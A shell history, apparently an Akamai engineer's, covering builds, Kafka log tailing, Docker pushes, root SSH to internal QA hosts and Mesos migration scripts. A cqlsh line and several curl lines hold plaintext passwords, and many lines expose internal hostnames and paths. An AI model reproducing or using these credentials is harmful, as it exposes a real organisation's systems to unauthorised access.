dev7482pulsar_dashboard --ssl dev-portal-cdb.akamai.com +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=dev -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=qa -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +clear +git s +ls -lrt +git status +git checkout . +git status +git pull +clear +git l +ls -lrt +clear +ls -lrt +git pull +git s +rm dashboard-webapp/src/main/java/com/akamai/pulsar/configuration/CorsFilter.java +git s +rm -rf dashboard-webapp/src/main/java/com/akamai/pulsar/configuration/CorsFilter.java +git s +clear +clear +git pull +git l +clear +clear +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=qa -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +clear +clear +ls -lrt +ls -lrt +rm PastBills.pdf +clear +clear +git l +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=qa -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +ps -eaf | grep pidgin +sudo kill -9 5469 +ps -eaf | grep pidgin +ls -lrt +ls -lrt +vim README.md +git s +clear +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=qa -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +grep -r "TargetEnvironmentValidator" . +vim README.md +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=qa -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar + +CONSUMER='/opt/kafka/bin/kafka-console-consumer.sh --new-consumer' +TOPIC=pm-backend-purple +export BOOTSTRAP_SERVER=sqa-kafbrk01.sqaextranet.akamai.com:6667 +CONSUMER='/opt/kafka/bin/kafka-console-consumer.sh --new-consumer' +$CONSUMER --consumer.config=$CONSUMER_PROPERTIES --bootstrap-server=$BOOTSTRAP_SERVER --topic $TOPIC | jq -c $JQ_FILTER +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend-purple --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic core-authz --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic authz--bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic authz --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic authz --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,level,logger,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,level,logger,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend-purple --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,level,logger,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,level,logger,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c 'select(.level=="ERROR")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-authz --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-authn --bootstrap-server=sqa-kafbrk01.sqaextranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-authn --bootstrap-server=p3-kafbrk01.sqaextranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-authn --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic pm-backend --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic alerts --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic schedule-engine --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic schedulee-engine --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic scheduler-engine --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic billing-center --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic billing-center-api --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic alerts-api --bootstrap-server=p3-kafbrk01.extranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +ls -lrt +ls -lrt +ls -lrt +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +scp -S gwsh root@sqainfra-docker01.sqaextranet.akamai.com:/tmp/new . +scp -S gwsh root@sqainfra-docker03.sqaextranet.akamai.com:/tmp/spoiled . +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +xit +clear +ls -lrt +clear +ls -lrt +git pull +clear +ls -lrt +git pull +ls -lrt +git pull +clear +ls -lrt +git pull +git pull +git checkout master +git pull +clear +git branch +git checkout release/1.9.2 +git pull +git branch +git pull +git checkout master +git pull +git pull +git branch +git push +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +gwsh pulsar-dashboard.akamai.com +clear +git pull +git pull +clear +ls -lrt +clear +ssh root@pdr-qa.akamai.com +clear +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +clear +ls -lrt +vim new +comm -2 -3 <(sort new) <(sort spoiled) > file3 +vim file3 +diff -a --suppress-common-lines -y spoiled new +diff spoiled new +clear +vim spoiled +sdiff spoiled new +diff spoiled new +clear +docker images +clear +kssh root@ +ssh root@ +clear +scp pdommeti-* bos-lvthz:/home/pdommeti/.ssh +scp pdommeti-* bos-lvthz.bos01.corp.akamai.com:/home/pdommeti/.ssh +ssh-add -l +vim ~/.ssh/pdommeti-internal-2017-03-20.pub +scp pdommeti-* bos-lvthz.bos01.corp.akamai.com:/home/pdommeti/.ssh +clear +docker version +clear +docker version +clear +clear +git pull +clear +vim Dockerfile +clear +docker build . +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true +cat ~/.m2/settings.xml +env +env | grep -i java +clear +docker build . +docker images +docker rmi 083 +clear +docker images +docker rmi -f 64 +docker rmi -f 64ef +docker rmi -f ef0 +docker rmi -f 64ef +clear +docker build . +docker tag 465a55147bc2 pdr-qa-upload.akamai.com/pulsar/blazedas:docker-17.04 +docker push pdr-qa-upload.akamai.com/pulsar/blazedas:docker-17.04 +cat ~/.docker/config.json +vim /etc/default/docker +clear +docker images +ls -lrt +vim 1.0.1-RELEASE +clear +diff spoiled new +clear +ssh bos-lvthz +ssh bos-lvthz.bos01.kendall.corp.akamai.com +ssh bos-lvthz.corp.kendall.corp.akamai.com +ping bos-lvthz +ssh bos-lvthz.kendall.corp.akamai.com +ping bos-lvthz + +ssh bos-lvthz.bos01.corp.akamai.com +sudo add-apt-repository ppa:webupd8team/java +ssh bos-lvthz.bos01.corp.akamai.com +pdr --addr="pdr-qa.akamai.com" images | grep billing-center-api +pdr --addr="pdr.akamai.com" images | grep billing-center-api +pdr --addr="pdr.akamai.com" images +pdr --addr="pdr.akamai.com" images > /tmp/pdr-images +ls -lrt +cat pdr-images | wc -l +vim pdr-images +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +export BOOTSTRAP_SERVER=sqa-kafbrk01.sqaextranet.akamai.com:6667 +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +clear +docker images +sudo vim /etc/default/docker +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +ls -lrt +rsync -arve ssh root@pdr-qa.akamai.com:/tmp +rsync -arve ssh docker* root@pdr-qa.akamai.com:/tmp +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +docker ps -a +docker images +docker tag 465a55147bc2 pdr-qa-upload.akamai.com/pulsar/blazedas:docker-17.04-v1 +docker push pdr-qa-upload.akamai.com/pulsar/blazedas:docker-17.04-v1 +vim ~/Downloads/docker-17.04-v1 +rm -r ~/Downloads/docker-17.04* +clear +ls -lrt +scp docker* root@pdr-qa.akamai.com:/tmp +vim ~/Downloads/docker-17.04-v1 +ls -lrt +cat Dockerfile +clear +ls -lrt +vim Dockerfile +vim Dockerfile +vim ../pulsar-ubuntu/Dockerfile +vim Dockerfile +docker build . +vim ../tomcat8/Dockerfile +docker tag 8d984b93bf3c pdr.akamai.com/library/oracle-java8:platform-2.4-TEST +docker push pdr.akamai.com/library/oracle-java8:platform-2.4-TEST +docker tag 8d984b93bf3c pdr-qa-upload.akamai.com/library/oracle-java8:platform-2.4-TEST +docker push pdr-qa-upload.akamai.com/library/oracle-java8:platform-2.4-TEST +docker images +docker rmi pdr.akamai.com/library/oracle-java8:platform-2.4-TEST +clear +docker build . +vim ../tomcat8/Dockerfile +docker build . +docker tag f1eaab48207c pdr-qa-upload.akamai.com/library/tomcat8:pawan-test +docker push pdr-qa-upload.akamai.com/library/tomcat8:pawan-test +vim ~/Downloads/pawan-test +ssh root@pdr-qa.akamai.com +rsync -arve gwsh docker root@sqainfra-docker01.sqaextranet.akamai.com:/tmp +rsync -arve gwsh docker root@sqainfra-docker02.sqaextranet.akamai.com:/tmp +rsync -arve gwsh docker root@sqainfra-docker03.sqaextranet.akamai.com:/tmp +rsync -arve gwsh docker root@sqainfra-docker04.sqaextranet.akamai.com:/tmp +rsync -arve gwsh docker root@sqainfra-docker05.sqaextranet.akamai.com:/tmp +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +gwsh root@sqainfra-docker04.sqaextranet.akamai.com +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +gwsh root@sqainfra-docker04.sqaextranet.akamai.com +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +docker ps +docker images +docker tag 465a55147bc2 pdr-upload.akamai.com/pulsar/blazedas:docker-17.04 +docker push pdr-upload.akamai.com/pulsar/blazedas:docker-17.04 +vim ~/Downloads/docker-17.04 +ssh root@pdr-qa.akamai.com +./akamake alldistclean +clear +./akamake all AKAMAKE-LINUX-BUILD-64=1 +ls -lrt +vim buildjava/ +./akamake all AKAMAKE-LINUX-BUILD-64=1 -d +./akamake all AKAMAKE-LINUX-BUILD-64=1 -d +./akamake all AKAMAKE-LINUX-BUILD-64=1 --debug +ls -lrt +ls -lrt +ls -lrt +vim akamake +grep -r "java7" . +find . -name akamake | xargs cat | grep "java7" +find . -name akamake | xargs cat +find . -name akamake | xargs cat | grep -i "java" +find . -name akamake | xargs cat | grep -i "java8" +find . -name akamake | xargs cat | grep -i "java7" +ls -lrt +ls -lrt +mv java7/ backup +./akamake all AKAMAKE-LINUX-BUILD-64=1 --debug +./akamake alldistclean +./akamake all AKAMAKE-LINUX-BUILD-64=1 --debug +ls -l +clear +vim akamake +vbe +git status +git checkout master +git pull +clear +git l +ls -lrt +find . -name "maven.dummy" +ls -lrt +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 -d +ls -lrt +ls -lrt +ls -lrt +ls -a +clear +git pull +git checkout master +git pull +./gitp4sync.py pmesos1 +ls -lrt +ls -lrt +ls -lrt +clear +/u4/syscomm/bin/reserve -a +ssh-add -l +/u4/syscomm/bin/reserve -l +/u4/syscomm/bin/reserve -r -u amasleka -m ",,,,," -d 45d -c "Pulsar Infra Test" +/u4/syscomm/bin/reserve -r -m ",,," -d 45d -c "Pulsar Upgrade" +clear +/u4/syscomm/bin/reserve -l +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 --debug +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +scp -S gwsh root@sqa-docker03.sqaextranet.akamai.com:/a/pulsar-docker/bin/docker . +scp docker root@pdr-qa.akamai.com +scp docker root@pdr-qa.akamai.com:/a/pulsar-docker/bin +rm root@pdr-qa.akamai.com +clear +rm docker +clear +scp docker root@pdr-qa.akamai.com:/a/pulsar-docker/bin/docker-17.04 +scp -S gwsh root@sqa-docker03.sqaextranet.akamai.com:/a/pulsar-docker/bin/docker root@pdr-qa.akamai.com:/a/pulsar-docker/bin/docker-1.7.1 +scp -S gwsh root@sqa-docker03.sqaextranet.akamai.com:/a/pulsar-docker/bin/docker . +git status +scp docker root@pdr-qa.akamai.com:/a/pulsar-docker/bin/docker-1.7.1 +git checkout . +git status + +kdocker/bin/docker-1.7.1 +docker pull pdr-qa.akamai.com/library/tomcat8:platform-2.4.v1-LATEST +clear +docker pull pdr-qa.akamai.com/library/tomcat8:platform-2.4.v1-LATEST +gwsh root@sqa-docker03.sqaextranet.akamai.com +scp docker root@pdr-qa.akamai.com:/a/pulsar-docker/bin/docker-17.04 +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +gwsh root@sqa-docker03.sqaextranet.akamai.com +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +scp -S gwsh root@sqa-docker03.sqaextranet.akamai.com:/a/pulsar-docker/bin/docker /tmp/ +scp docker root@pdr-qa.akamai.com:/a/pulsar-docker/bin/docker-1.7.1 +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +gwsh root@sqainfra-docker02.sqaextranet.akamai.com +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqa-docker06.sqaextranet.akamai.com +vbe +clear +ls -lrt +rm -r pawan-test +clear +rm docker-17.04-v1 +clear +git pull +git l +git s +cleaer +git shelf +clear +ls -lrt +rm 1.0.1-RELEASE +clear +vim netmgmt.config +vim translate_pulsarmesos.pm +ls -lrt +p4 open configuration.prod.pulsar configuration.pulsar.shared configuration.s1.pulsar configuration.sqa2.pulsar +vim configuration.prod.pulsar +vim configuration.s1.pulsar +vim configuration.pulsar.shared +vim configuration.sqa2.pulsar +p4 submit +p4 open configuration.prod.pulsar configuration.pulsar.shared configuration.s1.pulsar configuration.sqa2.pulsar +vim configuration.sqa2.pulsar +vim netmgmt.config +vim configuration.sqa2.pulsar +gwsh root@sqainfra-mesos01.sqaextranet.akamai.com +d /tmp/netdeploy-pdommeti/ +vim setuplog. +gwsh root@ +clear +clear +ls -lrt +python4 healthchecks.py +./healthchecks.py +./healthchecks.py sqa2 +vim ~/marathon-creds.conf +./healthchecks.py sqa2 +clear +ls -lrt +./mesos.py +./mesos.py sqa2 +./marathon.py +./marathon.py --save sqa2 +cat ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +clear +cat ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +clear +gwsh root@ +gwsh root@qa-docker19.qaextranet.akamai.com:31801 +gwsh root@qa-docker19.qaextranet.akamai.com +gwsh root@qa-zk01.qaextranet.akamai.com +ls -lrt ~/ +gwsh root@qa-docker19.qaextranet.akamai.com +gwsh root@qa-docker04.qaextranet.akamai.com +clear +cat ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +cp ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 ~/Downloads/ +ls -lrt +rm -r qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-30-49 +rm -r qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-31 +rm -r qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-31-27 +rm -r qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-35-19 +clear +ls -lrt +gwsh root@qa-mesos01.sqaextranet.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com +gwsh root@qa-mesos03.qaextranet.akamai.com +vim mesos-migrate-dc.py +git checkout . +clear +vim ~/akamai-git/pulsar-platform-dev-ops/mesos-migrate-dc.py +./mesos-migrate-dc.py --colddc sqa2 --hostdc sqa2 ~/Downloads/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 ~/Downloads/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/Downloads/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +vim mesos-migrate-dc.py +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/Downloads/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +ssh lsg-east +gwsh root@qa-docker12.qaextranet.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com '/a/sbin/akamai_run stickystop pulsar_marathon' +gwsh root@qa-mesos02.qaextranet.akamai.com '/a/sbin/akamai_run stickystop pulsar_marathon' +gwsh root@qa-mesos03.qaextranet.akamai.com '/a/sbin/akamai_run stickystop pulsar_marathon +gwsh root@qa-mesos03.qaextranet.akamai.com '/a/sbin/akamai_run stickystop pulsar_marathon' +gwsh root@qa-mesos03.qaextranet.akamai.com '/a/sbin/akamai_run unstickystop pulsar_marathon' +gwsh root@qa-mesos02.qaextranet.akamai.com '/a/sbin/akamai_run unstickystop pulsar_marathon' +gwsh root@qa-mesos01.qaextranet.akamai.com '/a/sbin/akamai_run unstickystop pulsar_marathon' +ls -lrt +./marathon.py +./marathon.py sqa2 +ls -lrt +./marathon.py sqa2 +./marathon.py +./marathon.py --app registrator ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./marathon.py sqa2 --app registrator ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./marathon.py sqa2 --app registrator +ls -lrt +./pulsar.py +./mesos-migrate-dc.py +vim README.md +./marathon.py sqashared --app registrator +gwsh root@qa-mesos01.qaextranet.akamai.com +ls -lrt +grep -r "apps" . +clear +./marathon.py +./marathon.py --app sqa2 +./marathon.py sqa2 --app registrator +vim ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +ls -lrt +./mesos-migrate-dc.py +./mesos-migrate-dc.py sqa2 marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +grep -r "You cannot specify both uris and fetch fields" . +clear +ls -lrt +./marathon.py +./marathon.py sqa2 +vim mesos.py +vim mesos-migrate-dc.py +./mesos +./mesos-migrate-dc.py +./mesos-migrate-dc.py --marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20- -colddc sqa2 +./mesos-migrate-dc.py --marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20- -colddc sqa2 --hotdc +./mesos-migrate-dc.py --dryrun --colddc sqa2 --hotdc sqa2 --marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20- +vim ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-20-22 +rm ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-20-22 +vim ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./mesos-migrate-dc.py --dryrun --colddc sqa2 --hotdc sqa2 --marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +clear +./mesos-migrate-dc.py +vim ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-27-18 +rm ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-27-18 +ls -lrt ~/ +rm -r ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-27-30 +clear +vim ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +subl ~/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +vim ~/registrator.json +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/registrator.json +vim ~/registrator.json +./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/registrator.json +curl -ik -u pdashboard_sqa2:e8mmy13t0x94nfdi -X POST --header "Content-Type:application/json" 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+./mesos-migrate-dc.py --colddc sqa2 --hotdc sqa2 --marathonjson ~/Downloads/qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-20-04-12 +gwsh root@qa-docker27.qaextranet.akamai.com +gwsh rootqa-docker08.qaextranet.akamai.com +gwsh root@qa-docker08.qaextranet.akamai.com +gwsh root@qa-docker05.qaextranet.akamai.com +gwsh root@qa-docker31.qaextranet.akamai.com +ssh lsg-east +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-sso --bootstrap-server=qa-kafbrk01.qaextranet.akamai.com:6667 | jq -c 'select(.level=="INFO")|{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-sso --bootstrap-server=qa-kafbrk01.qaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic authz --bootstrap-server=qa-kafbrk01.qaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,message}' +/opt/kafka/bin/kafka-console-consumer.sh --new-consumer --topic ids-authn --bootstrap-server=qa-kafbrk01.qaextranet.akamai.com:6667 | jq -c '{timeInMilliseconds,message}' +kmi-client-check shared -r release-netmgmt-9519-2017-04-21-06-01 - +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +clear +ifconfig +nslookup akamai.com +mac dig +man dig +ipconfig +ifconfig +pr +man pr +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +chmod a+x akamake +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +ls -lrt +ls +gwsh root@qa-docker05.qaextranet.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com +gwsh root@qa-docker15.qaextranet.akamai.com +d +git s +l +vim ./restart-apps.py +./restart-apps.py +clear +ssh root@pdr-qa.akamai.com +clear +gwsh root@sqainfra-docker01.sqaextranet.akamai.com +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +clear +ls -lrt +mkdir platform-metrics +p4 client +p4 client +p4 client -t buildsystem_pulsar-platform-metrics_1.0_alsi8-lib64_template pdommeti-platform-metrics +echo "P4CLIENT=pdommeti-platform-metrics" > .perforce +p4 sync +echo "P4CLIENT=pdommeti-platform-metrics" > .perforce +p4 client -t buildsystem_pulsar-platform-metrics_1.0_alsi8-lib64_template pdommeti-platform-metrics +p4 sync +vbe +clear +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +vim componentinfo.xml +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +ls -lrt hostsetup/ +vim componentinfo.xml + +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +vim pulsar-platform-metrics.tar.gz +vim pulsar-platform-metrics-cp.tar.gz +vim pulsar-platform-metrics-config.tar.gz +ls -lrt +ls -lrt +ls -lrt python-libs/ +ls -lrt python-libs/pandas +ls -lrt +clear +clear + +curl -vk --user pdashboard_sqa2:e8mmy13t0x94nfdi -H 'Content-Type: application/json' -X GETsqa2.pulsar.akamai.com:8443/v2/apps +clear +curl -vk --user pdashboard_sqa2:e8mmy13t0x94nfdi -H 'Content-Type: application/json' -X GETsqa2.pulsar.akamai.com:8443/v2/apps | jq . +curl -vk --user pdashboard_sqa2:e8mmy13t0x94nfdi -H 'Content-Type: application/json' -X GETsos01.qaextranet.akamai.com:8443/v2/apps | jq . +vbe +gwsh root@qa-mesos01.qaextranet.akamai.com +gwsh root@qa-mesos02.qaextranet.akamai.com +gwsh root@qa-mesos03.qaextranet.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com +gwsh root@sqainfra-mesos01.sqaextranet.akamai.com +clear +l +vim akamake +vim hostsetup/configure_pulsarplatformmetrics.pl +./marathon.py +./marathon.py sqa2 +clear +ls -lrt +./pulsar.py +./mesos.py +./mesos.py sqa2 +./mesos.py --tasks sqa2 +./mesos.py --tasks test-java sqa2 +./mesos.py --tasks test-java sqainfra +gwsh root@sqainfra-mesos01.sqaextranet.akamai.com +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +gwsh root@qa-mesos01.qaextranet.akamai.com +gwsh root@qa-docker01.qaextranet.akamai.com +clear +ls -lrt +p4 open * +subl configuration.prod.pulsar +vim configuration.nss1.pulsar +vim configuration.pulsar.shared +vim configuration.s1.pulsar +vim configuration.prod.pulsar +vim configuration.sqa2.pulsar +p4 submit +p4 diff +p4 submit +ssh root@ +kmi-client-check sqa1 -r release-netmgmt-9519-2017-04-26-05-00 - +ssh root@ +ssh root@cust-proc01.sqa2.qa.akamai.com +ssh root@ +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +ssh lsg-east +gwsh root@sqa-docker15.sqaextranet.akamai.com +gwsh root@sqa-mesos03.sqaextranet.akamai.com +gwsh root@sqa-docker17.sqaextranet.akamai.com +gwsh root@sqa-mesos03.sqaextranet.akamai.com +clear +rm index* +clear +rm IMG_0174.MOV.mov +clear +git pull +git l +p4 sync +clear +p4 log +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +clear +ls -lrt +vim mesos-migrate-dc.py +vim pulsar.py +vim mesos-migrate-dc.py +vim pulsar.py +vim mesos-migrate-dc.py +clear +./mesos-migrate-dc.py --colddc sqainfra --hostdc sqainfra --dryrun +./mesos-migrate-dc.py --colddc sqainfra --hotdc sqainfra --dryrun +cat ~/sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-04-27-16-20-18 +ls -lrt +rm -r sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-04-27-16-20-09 +rm -r qa-mesos01.qaextranet.akamai.com-apps.json.2017-04-20-2* +clear +ls -lrt +mv sqainfra-mesos01.sqaextranet.akamai.com-apps.json.2017-04-27-16-20-18 sqainfra-apr-27.json +ls -lrt +cat sqainfra-apr-27.json +vim sqainfra-apr-27.json +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +gwsh root@sqa-mesos01.sqaextranet.akamai.com +gwsh root@sqa-docker15.sqaextranet.akamai.com + +sql2 -q storage.dev.query.akadns.net "SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%waiting for lo to become free. Usage count%" AND f.machineip = s.ip;" +sql2 -q mega.dev.query.akadns.net "SELECT f.machineip ip_key FROM filesys_error f, system s WHERE kernel_dmesg LIKE "%waiting for lo to become free. Usage count%" AND f.machineip = s.ip;" +sql2 -q storage.dev.query.akadns.net "select SUM(files) files, SUM(bytes) / (1000 * 1000 * 1000 * 1000 * 1000) PB from repl_disk_usage" +sql2 